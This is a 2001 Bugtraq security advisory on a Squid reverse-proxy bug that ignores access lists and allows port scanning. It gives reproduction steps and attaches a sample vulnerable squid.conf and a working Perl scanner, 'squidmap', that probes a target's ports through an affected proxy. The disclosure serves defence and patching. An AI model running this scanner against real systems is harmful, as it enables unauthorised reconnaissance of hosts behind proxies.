[21620] in bugtraq
Squid httpd acceleration acl bug enables portscanning
daemon@ATHENA.MIT.EDU (Paul Nasrat)
Wed Jul 18 16:24:11 2001
Date: Wed, 18 Jul 2001 21:16:01 +0100
From: Paul Nasrat <pnasrat@uk.now.com>
To: bugtraq@securityfocus.com
Message-ID: <20010718211601.A23897@uk.now.com>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="Dxnq1zWXvFF0Q93v"
Content-Disposition: inline
--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Security Advisory: NASR-2001-001 <pnasrat@uk.now.com>
Date: 18 July 2001
Summary:
Squid can be used to proxy and also portscan if set up as a httpd
accelerator (reverse proxy).
Versions Affected:
2.3STABLE3 and 2.3STABLE4 unpatched
This includes the RedHat 7.0 squid, but not RedHat 6.2 or 7.1 -
vendors basing their RPMS on RedHat 7.0 are advised to check and
apply the patch from the squid site. Debian uses 2.2 and 2.4 so
is unaffected.
Description of problem:
Squid has a known bug in 2.3STABLE4 which ignores acl's in httpd_accel
mode. Note this is only if in httpd_accel_host is set and
httpd_accel_with_proxy off is set. This is not the default
configuration so it is not vulnerable without making these configuration
changes.
This enables portscanning via squid running in this mode
potentially allowing remote attackers to comprimise machines through
a squid set up this way.
I discovered this whilst doing a security test on a variety of configs
and later confirmed it from the squid site below:
http://www.squid-cache.org/Versions/v2/2.3/bugs/
Steps to Reproduce:
1. Set squid to httpd_accel mode, with a particular host and strict
acl's
2. export httpd_proxy="http://squid-server:port"
3. lynx http://victim:port/
Actual Results: You get a http 200 code if the port is open and
sometimes a response with some services SSH, SMTP, etc
Expected Results: Should be access denied (403)
Discussion:
Proxies have often been used in anonymizing attacks on http, but as more sites uuse reverse proxying as a method of distributing their network load and load balancing requests there is the possibility that malicious users could gain proxied access or internal information via them. I attach a sample squid.conf and a sample perl portmapper taking advantage of this bug. Squid will log you running this so it isn't anonymous, and the task of discovering accelerated sites automatically is left as an exercise for the reader.
Solution:
Squid are aware of this bug and have a patch on their site.
RedHat, Immunix and others have been notified and updates
are imminent later today.
Consider using additional security measures such as a
squid redirector, packet filtering, etc.
Paul Nasrat
- --
"we apologise for any inconvenience" - God's Last Message to His Creation
Courtesy of Douglas Adams
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE7VbucnB2rnqD9/ooRAlM2AJ4xXtjoiLpMH9PwWbh6d1KPQzTxOACgoTRA
5iTMflCCdMGKDMW8+NowgzI=
=lohz
-----END PGP SIGNATURE-----
--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="squid.conf"
# Sample Squid Config
# Paul Nasrat <pnasrat@uk.now.com>
http_port 3128
cache_mem 128 MB
refresh_pattern ^ftp: 1440 20% 10080
refresh_pattern ^gopher: 1440 0% 1440
refresh_pattern . 0 20% 4320
acl all src 0.0.0.0/0.0.0.0
acl manager proto cache_object
acl localhost src 127.0.0.1/255.255.255.255
acl SSL_ports port 443 563
acl Safe_ports 80
acl CONNECT method CONNECT
http_access allow manager localhost
http_access deny manager
http_access deny CONNECT !SSL_ports
http_access deny !Safe_ports
http_access allow localhost
httpd_accel_host localhost
httpd_accel_port 80
httpd_accel_with_proxy off
--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=squidmap
#!/usr/bin/perl
# Author: Paul Nasrat <pnasrat@uk.now.com>
# Date: 7 July 2001
$|++;
require LWP::UserAgent;
use Getopt::Std;
getopts('b:P:t:L:H:',\%args);
if ($args{t} eq "") { # Specify a port for tomcat
print_help();
exit 0;
}
$low = $args{L} || 1;
$high = $args{H} || 8192;
$proxy = $args{b};
$proxy_port = $args{P} || 80;
$target = $args{t};
$ua = LWP::UserAgent->new;
$ua->proxy(['http', 'ftp'], "http://$proxy:$proxy_port/");
print "squidmap $version scanning $target via http://$proxy:$proxy_port\n";
print "Port\tState\t\tService\t\tResponse\n";
# for loop hard coded - fixme
for ($port=$low;$port<=$high;$port++) {
$request = HTTP::Request->new('CONNECT', "http://$target:$port");
my $res = $ua->request($request);
my $service = getservbyport($port, tcp);
# Check the outcome of the response
if ($res->is_success) {
print "$port\topen\t\t", $service, "\t\t", $res->content, "\n";
}
}
sub print_help {
print 'Usage: squidmap <options> where options:',"\n";
print '-b host HTTP proxy via host',"\n";
print '-P ## HTTP proxy port (default: 80)',"\n";
print '-L ## low end/start of range (default: 1)',"\n";
print '-H ## high end/end of range (default: 8192)',"\n";
print '-t host target to attempt to scan',"\n";
}
--Dxnq1zWXvFF0Q93v--
